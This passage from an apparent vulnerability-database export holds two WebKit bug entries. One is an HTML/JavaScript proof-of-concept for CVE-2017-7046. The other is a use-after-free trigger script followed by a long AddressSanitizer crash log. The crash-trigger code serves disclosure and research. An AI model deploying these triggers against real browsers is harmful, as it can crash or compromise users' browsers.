WebCore::RenderObject with accessibility enabled(CVE-2017-7046)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96309", "id": "SSV:96309", "sourceData": "\n <style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96309", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, 
{"lastseen": "2017-11-19T11:56:47", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\n### PoC:\r\n\r\n=================================================================\r\n```\r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\r\n```\r\n=================================================================\r\n\r\n### ASan log:\r\n```\r\n=================================================================\r\n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8\r\nREAD of size 8 at 0x60c0000b7070 thread T0\r\n==29516==WARNING: invalid path to external symbolizer!\r\n==29516==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)\r\n #1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)\r\n #2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #4 0x11e792118 in JSC::FreeList 
JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n #24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)\r\n #25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)\r\n #26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)\r\n #27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)\r\n #28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)\r\n #29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)\r\n #30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)\r\n #31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)\r\n #32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)\r\n #33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)\r\n #34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)\r\n #35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #50 0x7fffd24b6ebb in RunCurrentEventLoopInMode 
(/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)\r\nfreed by thread T0 here:\r\n #0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)\r\n #5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)\r\n #6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)\r\n #7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous 
namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, 
WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)\r\n #7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)\r\n #8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)\r\n #9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) 
